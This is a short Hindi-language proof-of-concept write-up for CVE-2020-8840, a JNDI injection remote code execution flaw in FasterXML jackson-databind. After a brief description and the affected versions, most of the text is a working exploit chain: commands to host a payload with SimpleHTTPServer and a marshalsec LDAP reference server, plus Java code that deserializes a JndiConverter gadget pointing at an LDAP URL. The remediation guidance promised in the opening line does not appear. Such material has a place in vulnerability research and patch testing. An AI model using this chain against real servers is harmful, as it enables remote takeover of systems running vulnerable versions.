
CVE-2020-8840 के लिए PoC शोषण: FasterXML jackson-databind में दूरस्थ कोड निष्पादन की ओर ले जाने वाला JNDI इंजेक्शन। पर्यावरण सेटअप, शोषण श्रृंखला और उपचार मार्गदर्शन शामिल है।
jackson-databind FasterXML परियोजना समूह के अंतर्गत एक JSON प्रसंस्करण पुस्तकालय है।
19 फरवरी को, NVD ने एक सुरक्षा बुलेटिन जारी किया जिसमें jackson-databind में JNDI इंजेक्शन के कारण रिमोट कोड निष्पादन भेद्यता (CVE-2020-8840) का खुलासा किया गया, CVSS स्कोर 9.8 है। jackson-databind के प्रभावित संस्करणों में कुछ xbean-reflect/JNDI ब्लैकलिस्ट क्लासेस की अनुपस्थिति के कारण, जैसे org.apache.xbean.propertyeditor.JndiConverter, हमलावर JNDI इंजेक्शन का उपयोग करके रिमोट कोड निष्पादन कर सकते हैं, और सफल हमला सर्वर पर नियंत्रण प्राप्त कर सकता है (वेब सेवा स्तर)।
2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2

यहाँ simplehttp का उपयोग करके वेब सेवा स्थापित की गई है।python -m SimpleHTTPServer 8080

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#Exploit


poc --> ldap --> http
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String args[]) {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/Exploit\"}]";
try {
mapper.readValue(json, Object.class);
} catch (IOException e) {
e.printStackTrace();
}
}
}
